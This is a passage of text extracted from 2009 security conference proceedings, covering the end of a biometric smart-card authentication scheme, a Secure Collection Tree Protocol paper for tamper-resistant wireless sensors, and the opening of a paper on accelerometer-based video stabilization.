is successfully authenticated by the server and vice versa. The user’s secrets are her biometric template W  and the smart card while the server is in possession of its secret key k. In authentication phase, the following steps are carried out. 1. The user takes a fresh biometric scan to get a template W  and calculates A ⊕ W  after reading the value A from the smart card. 2. The user decodes A ⊕ W  to get her secret random number R. 3. The user reads B from the smart card and calculates C = B ⊕ h(R). 4. The user gets the current timestamp T1 and calculates D1 = h(C ⊕ T1 ). 5. The user sends D1 , T1 along with her ID to the server. 6. The server verifies the format of user’s ID. If the format is not valid, the request is rejected. 7. The server gets the current timestamp T1 and verifies that T1 − T1 does not exceed ΔT . If it does, the request is rejected. 8. The server calculates C  = h(ID ⊕ k) and D1 = h(C  ⊕ T1 ). 9. The server verifies that D1 and D1 are equal. If they are not, the request is rejected. Otherwise the request is accepted, i.e., the user is successfully authenticated. 10. The server gets the current timestamp T2 and calculates D2 = h(h(C  ⊕ T2 )). 11. The server sends D2 and T2 to the user. 12. The user gets the current timestamp T2 and verifies that T2 − T2 does not exceed ΔT . If it does, the request is rejected. 13. The user calculates D2 = h(h(C ⊕ T2 )). User (U ) Input: W  , SC

Server (S) Input: k

R = D(A ⊕ W  ) C = B ⊕ h(R) Get current timestamp T1 D1 = h(C ⊕ T1 )

T2

Get current timestamp Check whether T2 − T2 ≤ ΔT D2 = h(h(C ⊕ T2 )) Check whether D2 = D2

ID, D1 , T1 -



D2 , T 2

Check format of ID Get current timestamp T1 Check whether T1 − T1 ≤ ΔT C  = h(ID ⊕ k) D1 = h(C  ⊕ T1 ) Check whether D1 = D1 Get current timestamp T2 D2 = h(h(C  ⊕ T2 ))

Fig. 2. Authentication phase of the proposed scheme

214

S. Ziauddin

14. The user verifies that D2 and D2 are equal. If they are not, the request is rejected. Otherwise the request is accepted, i.e., the server is successfully authenticated. If both steps 9 and 14 are successful, this indicates a successful mutual authentication being carried out. The authentication phase of the proposed scheme is illustrated in Figure 2.

5

Security Analysis

In this section, we analyze the security of our scheme against an extensive set of security requirements that we consider to be necessary for a two-factor remote authentication scheme using biometrics and smart cards. User Impersonation Attack. In this attack, the attacker impersonates the user by deceiving the server to accept him as a legitimate user. This attack will not succeed against our scheme because the attacker has to generate a valid message (ID, D1 , T1 ) to impersonate a user. The user generates D1 by using her biometric template W  and the values A and B stored on the smart card. Therefore, it is not feasible for the attacker to fabricate D1 without knowing the user’s biometrics and the data stored on the smart card. In addition, it is not feasible for the attacker to find R (or A, B) from D1 due to onewayness property of hash function. Server Impersonation Attack. In this attack, the attacker impersonates the server by deceiving the user to accept him as the legitimate server. This attack will not succeed against our scheme bacause the attacker has to generate a valid message (D2 , T2 ) to impersonate the server. D2 is generated by the server using its secret key k. Therefore, it is not feasible for the attacker to fabricate D2 without knowing the server’s secret key. In addition, it is not feasible for the attacker to find k from D2 due to onewayness of hash function. Stolen Verifier Attack. In this attack, the attacker steals the biometric template database stored at the server. This is a very serious attack as biometric templates of all the users are compromised and due to irrevocability of biometric templates, this translates to identity theft of all the users. In our system, this attack does not exist because no database of biometric templates is maintained at the server. During registration phase, the server receives user’s biometric template, processes it to generate some useful information (A and B) and stores this information on a smart card. The smart card is returned to the user and her biometric template is immediately discarded (along with her secret random number R). During authentication phase, the user can regenerate R from a fresh template by using the data stored on the smart card.

A Two-Factor Mutual Authentication Scheme

215

Replay Attack. In this attack, an attacker replays a valid older message to impersonate the user or the server. This attack fails against our scheme because, for each transmitted message, a validation is carried out by the receiving entity to verify the elapsed time during communication and if the elapsed time is greater that the allowable delay, the receiving entity discards the message immediately. Consider a user-to-server message (ID, D1 , T1 ) replayed by the attacker. It is obvious that Step 7 of authentication phase will detect this attack. Second, note that the attacker cannot replace T1 by a newer time Tˆ because, without SC and W  , he cannot generate a valid D1 for Tˆ. Third, note that it is not feasible for the attacker to get the same D1 for a time Tˆ = T1 due to collision-resistance property of the hash function. Similarly, it is not feasible for the attacker to replay a server-to-user message (D2 , T2 ) due to the same reasoning. Stolen Biometrics Attack. Different biometric traits have varying degree of privacy, for example, it is extremely difficult to capture a person’s ratinal scan without her knowledge but it is much easier to capture a face image or record a voice signal. In a stolen biometrics attack, the attacker takes hold of the biometric reading of a user and uses it to impersonate that user. Stealing the biometric reading does not help the attacker in our scheme. To fabricate a message (ID, D1 , T1 ), the attacker has to find C = B ⊕ h(R) = h(ID ⊕ k). Even knowing W  , it is not feasible for the attacker to find R or k without having the smart card. Also note that guessing R or k correctly is infeasible due to their ˆ = R (resp. kˆ = k) such that C = B ⊕ h(R) ˆ (resp. high entropy, and finding R ˆ C = h(ID ⊕ k)) is infeasible due to collision-resistance of hash function. Stolen Smart Card Attack. The smart card stores the secrets A = E(R) ⊕ W and B = h(ID ⊕ k) ⊕ h(R). If the attacker steals the smart card, it is still not feasible to find k or R from B without breaking the onewayness of the hash function. Also, it is not feasible to get any useful information from A as both W and R are unknown. In addition, W and R are infeasible to guess as R is uniform random and W too has a high entropy, e.g., iris templates have an estimated 249 degrees of freedom [4]. Furthermore, the attacker can neither fabricate (ID, D1 , T1 ) nor (D2 , T2 ) without knowing either W  or k in addition to A and B. In Section 3, we mentioned that: 1) the server’s secret cannot be compromised, and 2) both the user’s secrets cannot be compromised at the same time. In addition, R cannot be stolen by the attacker as it is not stored anywhere in the system.

6

Conclusions

In this paper, we propose a scheme for mutual authentication using biometrics and smart card. As opposed to most existing schemes, which use password and smart card, we replace passwords with biometric readings which makes our scheme more secure, flexible and user-friendly. We provide a detailed security analysis of the scheme and show it to withstand many security threats.

216

S. Ziauddin

References 1. Chen, T., Lee, W.-B., Horng, G.: Secure SAS-like password authentication schemes. Computer Standards & Interfaces 27(1), 25–31 (2004) 2. Chien, H., Jan, J., Tseng, Y.: An efficient and practical solution to remote authentication: Smart card. Computers and Security 21(4), 372–375 (2002) 3. Daugman, J.: High confidence visual recognition of persons by a test of statistical independence. IEEE Transactions on Pattern Analysis and Machine Intelligence 15(11), 1148–1161 (1993) 4. Daugman, J.: The importance of being random: statistical principles of iris recognition. Pattern Recognition 36(2), 279–291 (2003) 5. Hao, F., Anderson, R., Daugman, J.: Combining crypto with biometrics effectively. IEEE Transactions on Computers 55(9), 1081–1088 (2006) 6. Hwang, M., Li, L.: A new remote user authentication scheme using smart cards. IEEE Transactions on Consumer Electronics 46(1), 28–30 (2000) 7. Hwang, M.S., Lee, C.C., Tang, Y.L.: A simple remote user authentication scheme. Mathematical and Computer Modelling 36(1), 103–107 (2002) 8. Juels, A., Wattenberg, M.: A fuzzy commitment scheme. In: ACM CCS 1999: 6th Conference on Computer and Communications Security, pp. 28–36 (1999) 9. Khan, M.K., Zhang, J.: Improving the security of ‘a flexible biometrics remote user authentication scheme’. Computer Standards & Interfaces 29(1), 82–85 (2007) 10. Ku, W.C., Chang, S.T., Chiang, M.H.: Further cryptanalysis of fingerprint-based remote user authentication scheme using smartcards. Electronics Letters 41(5), 240–241 (2005) 11. Lee, J.K., Ryu, S.R., Yoo, K.Y.: Fingerprint-based remote user authentication scheme using smart cards. Electronics Letters 38(12), 554–555 (2002) 12. Lee, S.W., Kim, H.S., Yoo, K.Y.: Improved efficient remote user authentication scheme using smart cards. IEEE Transactions on Communications 50(2), 565–567 (2004) 13. Lin, C.-H., Lai, Y.-Y.: A flexible biometrics remote user authentication scheme. Computer Standards & Interfaces 27(1), 19–23 (2004) 14. Lin, S., Costello, D.J.: Error Control Coding: Fundamentals and Applications. Prentice-Hall, Englewood Cliffs (1983) 15. Monro, D.M., Rakshit, S., Zhang, D.: DCT-based iris recognition. IEEE Trans. Pattern Anal. Mach. Intell. 29(4), 586–595 (2007) 16. Shen, J.J., Lin, C.W., Hwang, M.S.: Security enhancement for the timestamp-based password authentication scheme using smart cards. Computers & Security 22(7), 591–595 (2003) 17. Sun, H.: An efficient remote use authentication scheme using smart cards. IEEE Transactions on Consumer Electronics 46(4), 958–961 (2000) 18. Wildes, R., Asmuth, J.C., Green, G.L., Hsu, S.C., Kolczynski, R.J., Matey, J.R., McBride, S.E.: A machine-vision system for iris recognition. Machine Vision and Applications 9(1), 1–8 (1996) 19. Yang, S., Verbauwhede, I.: Secure iris verification. In: IEEE International Conference on Acoustics, Speech and Signal Processing, ICASSP, pp. II–133–II–136 (2007) 20. Yang, W.H., Shieh, S.P.: Password authentication schemes with smart cards. Computers & Security 18(8), 727–733 (1999) 21. Yoon, E.J., Ryu, E.K., Yoo, K.Y.: An improvement of Hwang-Lee-Tang’s simple remote user authentication schemes. Computers & Security 24(1), 50–56 (2005)

Secure Collection Tree Protocol for Tamper-Resistant Wireless Sensors Peter Pecho, Jan Nagy, Petr Han´ aˇcek, and Martin Drahansk´ y Brno University of Technology, Faculty of Information Technology, Brno, Czech Republic {pecho,inagy,hanacek,drahan}@fit.vutbr.cz

Abstract. We proposed modification of Collection Tree Protocol suitable for wireless sensors with tamper resistant module. This platform provides better security, however ordinary protocols cannot utilize its features. Our goal was to offer secure routing protocol with similar behavior and efficiency to the original protocol. Both protocols were simulated to prove that adding security to protocols does not necessarily lead to higher demands to data transfer and thus power consumption. Keywords: wireless sensor networks, routing protocol, smart card, tamper-resistant module, security.

1

Introduction

Current research of protocols for wireless sensor networks (WSNs) is mostly concerned on cheap, low-cost sensors without tamper-resistant coverage. It is usually supposed that sensor nodes will not be captured, because current applications are not attractive for attackers. With larger deployment of WSN, the applications processing sensitive data will appear. It is expected, that such sensor node will be an interesting goal to the attacker. Recently, researchers mostly assume that tamper-resistant sensor nodes cannot be used for massive applications because of their price, complexity and power consumption. We do not agree with this statement. Our concept of secure sensor node platform is cheap and provides much better security than recent solutions. This platform is based on combination of tamper-vulnerable portion (e.g. common sensor node hardware) and tamper-resistant portion (e.g. smart card, or any suitable cryptographic microcontroller) of sensor node. This platform offers not only accelerated cryptography, but also secure memory, that is not provided by another solutions (e.g. faster and advanced microcontroller chips). Utilization of ordinary protocols designed for low-cost sensors is not suitable for our platform, as they do not use security features of the tamper-resistant portion. This platform may be also used by various protocols based on secure hardware. We chose the Collection Tree Protocol (CTP), as one of the simple and widespread protocols. Our goal was to propose a modification of CTP that offers similar efficiency to the original CTP and has some security features. ´ ezak et al. (Eds.): SecTech 2009, CCIS 58, pp. 217–224, 2009. D. Sl  c Springer-Verlag Berlin Heidelberg 2009 

218

2

P. Pecho et al.

Wireless Sensors with Tamper-Resistant Module

WSNs are mostly used in a hostile environment; therefore the nodes may be highly vulnerable to any physical manipulation. As the sensor nodes provide many input/output channels together with hidden channels (power consumption, EM emissions, etc.), it is almost impossible to design reliable hardware protection. Tamper-resistant coverage is able to protect computational core of the node, but attached sensors are still unprotected. Therefore, it is better to define tamper-resistant sensor node as a sensor node composed of two portions: (1) common sensor node hardware as the tamper-vulnerable portion and (2) tamper-resistant module. Tamper-resistant module is a peripheral designed to be resistant against physical manipulation. The module is usually equipped by a microprocessor and secure memory, which contains keying material, sensitive data and algorithms. Only these algorithms can manipulate these data [4,5]. Tamper-resistant module cannot be cloned or emulated, because such features cannot be just replaced by software without special hardware support. Most widely used tamper-resistant device is a smart card. In this paper, we are concerned in contact microprocessor smart cards, according ISO/IEC 7816, as they are freely programmable [6][7]. Smart cards support private and public cryptography and have low power consumption. Subset of supported cryptographic algorithms is defined by smart card vendor and application area. Today, many smart card types offer RSA, ECC cryptography is still, however, implemented very rarely. For using sensor nodes with tamper resistant modules, protocols and schemes have to be redesigned due to following reasons: (1) task distribution between the portions, (2) limited memory and performance of the portions.

3

Collection Tree Protocol

Collection Tree Protocol (CTP) is a simple tree-based routing protocol proposed for gathering data from sensor nodes into root node (base station). All the communication is many-to-one or one-to-many type. The nodes form a set of routing trees, whereas multiple root nodes are allowed. The CTP is address-free protocol. The nodes send data frames to the next hop whereas establishment of routes is based on a routing gradient (link quality). The protocol has following properties [2]: – The CTP assumes that the link quality is estimated of number and location of nearby nodes. The estimation is based on number of transmissions whose acknowledgement is successfully received. – The CTP has several mechanisms in order to improve delivery reliability, but it does not promise 100% reliability – it is (just) best effort. – The CTP is designed for relatively low traffic rates. Bandwidth-consuming systems should use different protocol.

Secure Collection Tree Protocol for Tamper-Resistant Wireless Sensors

219

– The CTP uses expected transmissions (ETX) as its routing gradient. A base station (root node) has an ETX of 0. The ETX of other nodes consists of the ETX of their parents and the ETX of link to these parents. If several routes are available, the CTP should choose the one with the lowest ETX value. The routes are established during deployment of nodes. Periodical updates are not taken into account, only inconsistency in the network topology is detected. Loop in routing path is detected when a node chooses a route with a gradient value significantly higher than its own gradient. This may be caused by losing connectivity with the current parent node. For this issue, the CTP offers two solutions: (1) beacon frame and (2) ignoring routes with an ETX higher than a reasonable constant. The CTP provides also a handle for frame duplication. When a duplicate instance of frame is detected during its forwarding, it is dropped.

4

Secure Collection Tree Protocol

The CTP is proposed regard to minimum power consumption and no threats are considered. It does not propose any countermeasure against attacker and therefore its usage in real-world applications may be unacceptable. Simple usage of cryptographic mechanisms does not guarantee security of protocol as well. Secure Collection Tree Protocol (Secure-CTP) is a modification of CTP suitable for sensor nodes with tamper-resistant modules. This modification considers task distribution between tamper-vulnerable and tamper-resistant portion, as well as non-trustworthy channel between the portions. Our goal was to propose such protocol that offers high networking security at the cost of small energy overhead. 4.1

General Assumptions

To decrease power consumption of sensor node, smart card is powered up only for cryptographic operations. We suppose that attacker is able to capture sensor node and analyze its tamper-vulnerable portion. His knowledge, abilities and available equipment are not sufficient to reveal sensitive data from the tamper-resistant portion. In the worst case, the secure memory will be erased. Some specific applications, such as military sensor networks used for monitoring of adversary territory, may have higher requirements, however devices used in such applications usually have better physical protection and their price is much higher. Thus, we do not consider such applications. 4.2

Protocol Modifications

The Secure-CTP demonstrates how to utilize security features given by tamperresistant portion (smart card). Negative aspect of this sensor node platform

220

P. Pecho et al.

is higher production costs. Anyway, current smart cards offer best benefit-cost ratio [15]. The most significant changes in the Secure-CTP protocol are (1) usage of unique 16-bit identifier (ID), (2) modified usage of ETX, (3) usage of Routing Frame Counter and (4) usage of Message Authentication Code (MAC) that provides integrity and authentication of frames. Each sensor node has a unique, 16-bit ID stored in the smart card. The ID is read-only and is defined during manufacturing of the smart card. Each transmitted frame has attached ID of last hop sensor and MAC computed from the frame. The smart card also holds master key (shared by all smart cards in the network) and monotonic counters. The master key never leaves smart card and may be used only as parameter of cryptographic routines. This key together with a node identifier is used for the session key generation, thus the session key never leaves the smart card as well. When sensor node receives a routing frame with better routing gradient, the frame is sent to the smart card. Then link estimation to sender of this frame is also sent to the smart card. Inside the smart card a session key is generated from master key and source ID of the frame. (Generation of session key for unicast communication also require current node ID.) The session key is used for validation of MAC of the routing frame. When authenticity of the routing frame is confirmed, the link estimation is added to the routing gradient and new routing frame is secured by MAC. Such routing frame is then sent back to the sensor node. After that, new routing frame may be broadcasted to the neighbors. Routing frames are protected by 32-bit monotonic routing frame counter (RFC). Sensor node accepts only a routing frame with (1) a higher value of counter, or (2) lower value, but the difference is within an allowed range. Routing packets with other counter values are dropped. Recommended allowed range of RFC is 28 up to 210 . This range enables synchronization if the sensor node had received broken frames because of radio transmission problems. Lower values could cause synchronization problem, higher values could be misused to counter overflow. New sensor node added to the network has not received any RFC before. Thus, a special flag inside secure memory is set to indicate that any RFC from a valid routing frame may be accepted. The ETX value of last accepted routing frame is stored in memory of tamperresistant portion and it is incremented in a limited range. This modification in contrast to the CTP enables incrementation of only the ETX by 1, 2, or 3 bits (that means 1–2, 1–4, or 1–8), depending on implementation. We suppose that using more bits for link estimation does not have significant influence to the routing tree. Root nodes may initiate re-establishment of routing trees. They are the only nodes that could create zero ETX routing frames. During detection of inconsistency of the routes, the nodes should inform the root node by sending a beacon frame. This frame has to be protected by MAC to avoid beacon frame injection. Root node responds to the received inconsistency by sending the routing frame with zero ETX.

Secure Collection Tree Protocol for Tamper-Resistant Wireless Sensors

4.3

221

Frame Formats

Communication architecture for networked sensors is mostly based on the Active Messages model [3]. This layer is used as a network layer for the CTP and the Secure-CTP. Active message frame is used for transportation of any higher level communication. In the Secure-CTP following changes were proposed: (1) addition of the RFC and (2) addition of the MAC to the routing frame. In contrast to the CTP, we also defined addition of last hop ID and short frame counter used for link estimation. In the CTP implementation from official TinyOS-2.x distribution is also used frame counter for the same purpose, it is not, however, mentioned in the specification. Modifications of the routing frame format you can see on fig 1(a) and 1(b). Proposed modification of the CTP are suitable for static networks. If a network graph consists of disjointed graph components and sensor nodes are mobile, various values of RFC may appear in various components of the graph. Such conditions may be understood as a replay attack. Due to security reasons, the RFC cannot be reset and the sensors with different RFC cannot use the same routes to the base station. Moreover, existence of two ranges of the RFC in the same network may lead to repetitious, but useless updates of routing paths and that may lead to higher power consumption. Therefore, it is recommended to ignore frames with RFC value out of valid range. Fortunately, the most of sensor networks have a static topology. Thus, migration of the nodes between two disjoined networks is rather rarely.

(a) Routing frame format of CTP according the specification

(b) Routing frame format of Secure-CTP Fig. 1. Routing frame format of CTP and Secure-CTP

222

4.4

P. Pecho et al.

Security

Considered attacker is only able to reveal sensitive data from the tampervulnerable portion of sensor node and the cryptographic microcontroller stays secure. If we assume storing key keying material in the secure memory, it is enough to use symmetric cryptography. Data security is provided by symmetric cryptography, as probably all ISO/IEC 7816 smart cards offer 3DES or AES encryption at high speed. Chosen encryption algorithm defines 64-bit data blocks. Key length is 112 bits for 3DES and 128 bits for AES. Integrity of the frames is protected by CBC-MAC. From the 64-bit MAC, only last 32 bits are used. Frames without MAC are dropped. There are several possible key distributions, whereas we use a single shared key for the whole network. This key is loaded to the smart card prior to node deployment in a safe environment. At the same time we generate also the unique node identifier. For unicast data frame protection, pair-wise keys are used (1): kA→B = F (shared key, idA , idB ) kB→A = F (shared key, idB , idA )

(1)

Function F may be implemented as a concatenation, hash function, encryption algorithm, another cryptographic operation or their suitable combination. Output of this function may be shortened to satisfy key length requirements of chosen cryptographic algorithm. As F we recommend usage of concatenation of the values together with SHA-1 function. Resulting 160-bit digest must be trimmed to a valid key length of 112 bits (3DES) or 128 bits (AES). During broadcast of routing frames, receiver node ID is unknown. Thus, it is necessary to use only shared key and source node ID to generation broadcast session key (2). kbroadcast = F (shared key, id) (2) When confidentiality of transmitted data is required, it is possible to encrypt only data field of data frames. Frame header must remain plaintext, as the nodes need to know recipient of each frame. 4.5

Communication Overhead

The radio subsystem is typically a component with the highest power consumption of all relevant sensor node components. Many recent sensor nodes use CC2420 chipcon radio, which has similar supply current up to 20mA in receive and send mode [12]. Thus, each transferred byte has an influence to the network lifetime. The CTP defines routing frames at length of 5 bytes (+7 bytes of active message envelope and +2 bytes of link estimation library). This protocol was designed regard to minimum radio overhead injecting false or dummy packets may degrade its efficiency. The Secure-CTP routing frame was prolonged to 16 bytes (+ 7 bytes of active message envelope). Transfer of Secure-CTP routing frame increases the power consumption by 64% per routing frame.

Secure Collection Tree Protocol for Tamper-Resistant Wireless Sensors

4.6

223

Simulation Results

Results of simulation showed that adding a security to the CTP has only small influence to the total received and transmitted bytes. In case of CTP there is a lot of small frames transmitted, while in case of the Secure-CTP a smaller number of larger frames are transmitted. We suppose that this behavior is caused by adding the RFC to the routing frame, thus older routing frames are dropped more often. It was also found, that modified usage of ETX has a minimal effect to the process of routing tree establishment. The length of ETX has also no significant impact to amount of data – see tab. 1. Table 1. Simulation results of CTP and Secure-CTP 50% depl. nodes Total frames Median St.dev. recv(BF) 689 896 send(BF) 97 96 CTP recv(RF) 323 176 send(RF) 106 33 Total bytes 16,355 11,988 recv(BF) 1,868 1,079 send(BF) 234 112 S-CTP recv(RF) 172 75 send(RF) 82 17 Total bytes 27,644 15,505

Protocol

5

90% depl. nodes Total frames Median St.dev. 759 935 105 99 1,531 521 398 98 40,150 19,820 2,059 1,149 260 122 832 178 309 39 52,234 25,146

100% depl. nodes Total frames Median St.dev. 833 945 110 100 3,288 847 807 218 73,110 37,890 2,081 1,154 269 122 3,342 1,252 1,176 415 126,973 74,481

Conclusion

We have presented design of Secure-CTP protocol based on simple CTP protocol for sensor nodes with tamper-resistant modules. The results show that adding security features into protocols does not necessarily lead to higher demands of data transfer. Behavior of both protocols during simulation was rather similar, whereas only small variations were caused by random effects. For applications processing sensitive data, small communication overhead is much more acceptable, than exposing data. Moreover, moving cryptographic operations into specialized hardware may improve power efficiency. Proposed platform may be also suitable for various secure protocols that were not implemented yet, as no proper platform existed. It is expected, that also other protocols requiring similar secure sensor node platforms will appear.

Acknowledgment This research was supported by the Research Plan No. MSM, 0021630528 – Security-Oriented Research in Information Technology.

224

P. Pecho et al.

References 1. TinyOS - an open-source OS for the networked sensor regime, http://www.tinyos.net/ 2. Fonseca, R., Gnawali, O., Jamieson, K., Kim, S., Levis, P., Woo, A.: Collection Tree Protocol (CTP), http://www.tinyos.net/tinyos-2.x/doc/txt/tep123.txt 3. Buonadonna, P., Hill, J., Culler, D.: Active Message Communication for Tiny Networked Sensors. In: Proceedings of the 20th Annual Joint Conference of the IEEE Computer and Communications Societies (2001) 4. Anderson, J.P.: Computer security technology planning study, ESD-TR-73-51, vol. I. ESD/AFSC, Hanscom AFB, Bedford, Mass (NTIS AD-758 206) (October 1972) 5. Department of Defense, Trusted computer system evaluation criteria, DoD 5200.28STDm December 1985. US Department of Defense, December 26 (1985) 6. International Standardization Organization (ISO), Integrated circuit(s) cards with contacts - part 1: physical characteristics, ISO/IEC 7816-1 (1998) 7. International Standardization Organization (ISO).: Integrated circuit(s) cards with contacts - part 3: electronic signal and transmission protocols. ISO/IEC 7816-3 (1997) 8. FIPS 81, Operational modes of DES, Federal Information Processing Standard (FIPS), Publication 81, National Bureau of Standards, U.S. Department of Commerce, Washington D.C 9. Amin, F., Jahangir, A.H., Rasifard, H.: Analysis of public-key cryptography for wireless sensor networks security. In: Proceedings of World Academy of Science, Engineering and Technology (2008) ISSN 1307-6884 10. Rankl, W., Eng, W.: Smart Card Handbook, 3rd edn. John Wiley & Sons, Ltd., Chichester (2003) 11. Eschenauer, L., Gligor, V.D.: A Key-Management Scheme for Distributed Sensor Networks. In: Proceedings of the 9th ACM conference on Computer and communications security (2002) 12. Kramer, M., Geraldy, A.: Energy Measurements for MicaZ Node. In: 5. GI/ITG KuVS Fachgesprch Dahtlose Sensornetze, pp. 61–68 (2006) 13. Platon, E., Sei, Y.: Security software engineering in wireless sensor networks. In: Progress in Informatics, National Institute of Informatics (2008) 14. ATMEL: ATMega128 Datasheet: 8-bit AVR Microcontroller with 128K Bytes InSystem Programmable Flash (2008), http://www.atmel.com/dyn/resources/prod_documents/doc2467.pdf 15. Pecho, P., Zboril Jr., F., Drahansky, M., Hanacek, P.: Agent Platform for Wireless Sensor Network with Support for Cryptographic Protocols. Journal of Universal Computer Science (in press)

Accelerometer Based Digital Video Stabilization for Security Surveillance Systems Martin Drahanský, Filip Orság, and Petr Hanáček Faculty of Information Technology, Brno University of Technology CZ-612 66, Brno, Czech Republic {drahan, orsag, hanacek}@fit.vutbr.cz

Abstract. This paper is devoted to accelerometer based image stabilization for video based security surveillance systems. At the beginning an introduction to the image stabilization is presented. Short description of the actual state of common algorithms for image stabilization follows, including our solution with some partial optimizations. At the end, we present a suitable hardware platform having a built-in accelerometer, which is responsible for advanced stabilization. Keywords: image, stabilization, video-stream, accelerometer, DSP, FPGA.

1 Introduction Classical security surveillance systems using video-cameras are well known. Resolution of such cameras often doesn’t play an important role, but, in some cases (especially for military purposes), a high resolution is required. In this situation, not only a detection of some movements is expected, but some recognition or tracking is needed as well. The recognition can classify the object to one of predefined categories, i.e. a tank, soldier, ship, civil person, etc. If the object is recognized, the system should be able to track (follow the motion) this object, so that an automatic storage system has every time the tracked object in the middle of the video sequence or an operator can see this object in the middle of the screen. Placing of the monitoring system plays an important role, especially to the output video stream. If we have a camera with a high resolution and the camera is placed in someone’s hand or on a moving object (car, tank etc.), then the resulting video-stream is of very poor quality. An optimal solution is to place the camera on some stable holder, but if the height of such holder is too big, the camera will be exposed to the influences of the surroundings, e.g. wind, asperity of the road, waves on the sea etc. Therefore, the image stabilization in a video-stream is needed. The significant object is always in the same position in the screen. We distinguish between two types of movements with the camera [2]: • •

Weak shaking (app. ±10° variation in the horizontal and vertical directions and/or some small fractions of Hertz) Strong shaking (more than ±10° variation in the horizontal and vertical directions and/or tens of Hertz).

D. Ślęzak et al. (Eds.): SecTech 2009, CCIS 58, pp. 225–233, 2009. © Springer-Verlag Berlin Heidelberg 2009

226

M. Drahanský, F. Orság, and P. Hanáček

In the first case, the problem with shaking could be solved using pure software (digital) image stabilization. On the other hand, strong shaking is impossible to stabilize only with the software solution, i.e. some additional hardware is needed. This hardware can be based either on a servomotor unit or pneumatic/hydraulic unit, which are able to compensate the movements of the camera system in the opposite direction. Such hardware solution exceeds the scope of this article, however one solution is introduced here – an accelerometer based solution. Nevertheless, the hardware computing unit for digital image stabilization is described in the third chapter. This hardware unit is composed of two DSP processors with connected FPGAs and SDRAMs. The purpose of this unit is to ensure sufficient computational power for the digital image stabilization algorithm, which is introduced in the following chapter.

2 Image Stabilization Algorithms Image stabilization algorithms mostly consist of three main parts [2]: motion estimation, motion smoothing and motion compensation. Main task of the first block is to estimate a several local motion vectors and on the basis of these local estimates calculate a global motion vector. The second block deals with filtering, integration (respectively), of the estimated global motion vector. The main purpose of this stage is to smooth the calculated value and prevent large and undesirable differences between motion vectors calculated in past. The last block shifts the acquired image in inverse direction according to the global motion vector. This block can take into account more sophisticated transformations like rotation or warping. A lot of various approaches exist nowadays. The main difference lies in the resultant accuracy of global motion vector and algorithm used for estimation of local motion vector. We distinguish between pixel and sub-pixel resolution. Second approach is, however, complicated and more time consuming than the previous one because an interpolation method is needed. So it is rarely used in real-time applications. Some algorithms consider rotation or more complex warping in addition to translation. We will concentrate on algorithms that use translation with pixel accuracy only. In the following section is described a simply plain matching algorithm and some basic ideas of the stabilization. The next section will be devoted to one promising algorithm modification of which we used. 2.1 Plain Matching Algorithm As stated above, the algorithms that deal with stabilization are based on estimation of a motion represented by a motion vector [4]. The straightforward solution leads to use of a discrete correlation, cross-correlation respectively [1]. The discrete correlation produces a matrix of elements. The elements with high correlation (value) correspond to the locations where a chosen pattern and image match well. It means that the value of element is a measure of similarity in relevant point and we can find locations in an image that are similar to the pattern. The input is formed by a pattern (in the form of an image) F and an input image I. It is not necessary to search the whole image, thus a smaller area (search window

Accelerometer Based Digital Video Stabilization for Security Surveillance Systems

227

Fig. 1. a) Input image with marked search window (left); b) Correlation matrix obtained by correlation (right) [5]

N×N) is defined. At the same time, this area specifies the maximal shift in vertical and horizontal direction and is chosen in this manner. Eq. (1) represents a discrete 2D correlation function [4].

F D I ( x, y ) =

N

N

∑ ∑ F (i , j ) I ( x + i , y + j )

(1)

j =− N i = − N

Note that matching according to the first definition is problematic. Correlation can also be high in locations where the image intensity is high, even if it doesn’t match the pattern well. Better performance can be achieved by a normalized correlation [1]: N

N

∑ ∑ F (i, j) I ( x + i, y + j)

j =− N i =− N N

N

N

N

∑ ∑ (I ( x + i, y + j))2 ∑ ∑ F (i, j ) 2

j =− N i =− N

(2)

j =− N i=− N

Figure 1 shows an input image, pattern (red small area) and correlation matrix obtained by the normalized correlation. We defined the search window (green big area) and the pattern is searched within this window. The result matrix has the same dimensions as the search window (M×M). The pixel with the maximum value determines position of the pattern in the search window. Hence, it determines position of an area in the search window which is most similar to the pattern. The correlation can be calculated in the original (time) domain according to equation 2 however this approach is rarely used due to enormous time consumption. Note that for every point of correlation matrix is necessary to perform 2N×N multiplications and additions. We can obtain the same result with lesser effort in the frequency domain [1]. On the other hand, the Eq. (2) appears to be an ideal choice from the hardware processing point of view. The computation involves only the fixed-point arithmetic (adders and multipliers) which is suitable for an FPGA based implementation. Stated principle is theoretically ideal solution when we consider only translation. But in practice we have to deal with two problems. The first problem arises from

228

M. Drahanský, F. Orság, and P. Hanáček

finite resolution of registers and sampling and it causes existence of several points with maximal values in the correlation matrix. The second problem is dependency of results on the background noise which is present in the input video signal. It is necessary (in case of the image stabilization) to define several independent areas and to calculate correlation matrices for each of them. We obtain several local motion vectors and the global motion vector is calculated as their average or median. This method prevents errors coming from the correlation on problematic areas (e.g. with the same intensity). 2.2 Bit Plane Matching Algorithm

Some algorithms, in quest of improving the results, calculate the correlation from the images passed thru an edge detector [3]. This technique provides certain improvements, but the edge detectors tend to produce many useless pixels and are sensitive to the image intensity. Last but not least, the detector introduces additional time-consuming operation to the phase of processing. As most of edge detectors are nonlinear systems, it is not possible to make convolution in the frequency domain. The noise can be suppressed by ignoring the least significant bits. Then we can consider only the higher bits or take only some bit-planes and calculate the correlation using that plane, which consists only from one and zero values. Better results can be achieved by gray coded bit planes. The gray coding allows the motion estimation vector using a single bit-plane by encoding most of the useful information into a few planes. A small change in the gray level leads to a small change in the binary digits representing the intensity. Bit plane matching algorithm does not use correlation, as defined above, and defines a new, but very similar, operator (see Eq. (3)) that has to be minimized. Note that, in the previous task, we deal with maximization. In fact, it is the definition of correlation where the multiplication operator is replaced by the binary operator – exclusive or. E ( x, y ) =

N

N

∑ ∑ F (i, j) ⊕ I ( x + i, y + j)

(3)

j = − N i =− N

This error operator is calculated by minimizing the resulting local motion vector. Several (typically four) local motion vectors from each area along with the previous global motion vector are passed through a median operator to produce the current global motion vector estimate. Then, the global motion estimate can be optionally passed through a filter that is tuned in order to preserve intentional camera motion while removing the undesirable high frequency motion. The final filtered motion estimate is used then for shifting the current frame by an integer number of pixels in the opposite direction of the motion. The whole system is depicted at Figure 2.

Accelerometer Based Digital Video Stabilization for Security Surveillance Systems

229

e m Ti

IN P

Preprocessing – Gray-Coded Bit Plane

W

Current Frame M

Four Region Motion Estimation Past Frame

Integration

Global Motion Estimation Using Median

Motion Compensation (Pixel)

OUT

Fig. 2. Diagram of digital image stabilization

2.3 Enhancement – Our Solution for Image Stabilization

